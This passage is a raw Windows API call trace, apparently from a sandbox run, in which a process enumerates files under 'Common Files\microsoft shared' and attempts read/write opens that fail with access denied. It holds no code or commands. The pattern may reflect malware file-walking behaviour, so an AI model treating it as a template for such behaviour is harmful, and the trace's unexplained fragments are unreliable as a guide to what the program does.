(HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0102.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.474] AreFileApisANSI () returned 1 [0102.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x81fc8 [0102.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 68 [0102.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.474] GetFileType (hFile=0x27c) returned 0x1 [0102.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0102.474] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.474] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.475] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.475] CloseHandle (hObject=0x27c) returned 1 [0102.475] AreFileApisANSI () returned 1 [0102.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82568 [0102.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 68 [0102.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.475] GetLastError () returned 0x5 [0102.475] GetLastError () returned 0x5 [0102.475] SetLastError (dwErrCode=0x5) [0102.475] GetLastError () returned 0x5 [0102.475] SetLastError (dwErrCode=0x5) [0102.475] GetLastError () returned 0x5 [0102.475] SetLastError (dwErrCode=0x5) [0102.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0102.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.476] AreFileApisANSI () returned 1 [0102.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", lpUsedDefaultChar=0x0) returned 68 [0102.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0102.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.477] AreFileApisANSI () returned 1 [0102.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82b98 [0102.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 68 [0102.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.477] GetFileType (hFile=0x27c) returned 0x1 [0102.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0102.477] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.477] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.478] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.478] CloseHandle (hObject=0x27c) returned 1 [0102.478] AreFileApisANSI () returned 1 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0102.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0102.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 68 [0102.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.478] GetLastError () returned 0x5 [0102.478] GetLastError () returned 0x5 [0102.478] SetLastError (dwErrCode=0x5) [0102.478] GetLastError () returned 0x5 [0102.478] SetLastError (dwErrCode=0x5) [0102.478] GetLastError () returned 0x5 [0102.478] SetLastError (dwErrCode=0x5) [0102.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0102.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.479] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x86, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8b118, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x86, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ᵑ")) returned 0 [0102.558] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0102.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.559] AreFileApisANSI () returned 1 [0102.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv", lpUsedDefaultChar=0x0) returned 56 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.560] AreFileApisANSI () returned 1 [0102.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0102.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 56 [0102.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.560] GetLastError () returned 0x5 [0102.560] GetLastError () returned 0x5 [0102.560] SetLastError (dwErrCode=0x5) [0102.560] GetLastError () returned 0x5 [0102.560] SetLastError (dwErrCode=0x5) [0102.560] GetLastError () returned 0x5 [0102.560] SetLastError (dwErrCode=0x5) [0102.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.561] AreFileApisANSI () returned 1 [0102.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0102.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\TextConv") returned 56 [0102.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.561] GetLastError () returned 0x5 [0102.561] GetLastError () returned 0x5 [0102.561] SetLastError (dwErrCode=0x5) [0102.561] GetLastError () returned 0x5 [0102.561] SetLastError (dwErrCode=0x5) [0102.561] GetLastError () returned 0x5 [0102.561] SetLastError (dwErrCode=0x5) [0102.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0102.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0102.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a498 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.562] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0102.562] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\TextConv\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0102.562] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.562] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0102.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0102.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 